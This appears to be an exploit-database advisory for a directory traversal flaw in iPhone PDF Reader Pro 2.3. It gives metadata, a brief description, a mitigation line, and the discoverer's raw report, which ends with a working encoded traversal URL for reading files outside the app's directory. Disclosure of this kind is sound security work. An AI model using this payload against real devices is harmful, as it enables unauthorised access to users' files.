iPhone PDF Reader Pro 2.3 Directory Traversal

vendor:

iPhone PDF Reader Pro

by:

Khashayar Fereidani

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: iPhone PDF Reader Pro

Affected Version From: 2.3

Affected Version To: 2.3

Patch Exists: Not available

Related CWE: Not available

CPE: Not available

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: iPhone 4 (IOS 4.0.1)

Not available

iPhone PDF Reader Pro 2.3 Directory Traversal

A directory traversal vulnerability was discovered in iPhone PDF Reader Pro 2.3. This vulnerability allows an attacker to access files and folders outside of the application's root directory. The vulnerability was tested on an iPhone 4 running IOS 4.0.1 and was found to be of high risk.

Mitigation:

The application should be configured to only allow access to files and folders within the application's root directory.

Source

Exploit-DB raw data:

----------------------------------------------------------------
Software : iPhone PDF Reader Pro 2.3
Type of vunlnerability : Directory Traversal
Tested On : iPhone 4 (IOS 4.0.1)
Risk of use : High
----------------------------------------------------------------
Program Developer : http://itunes.apple.com/us/app/pdf-reader-pro/id300298606?mt=8
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

URL For Explore / Files And Folders : http://IP:8080//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/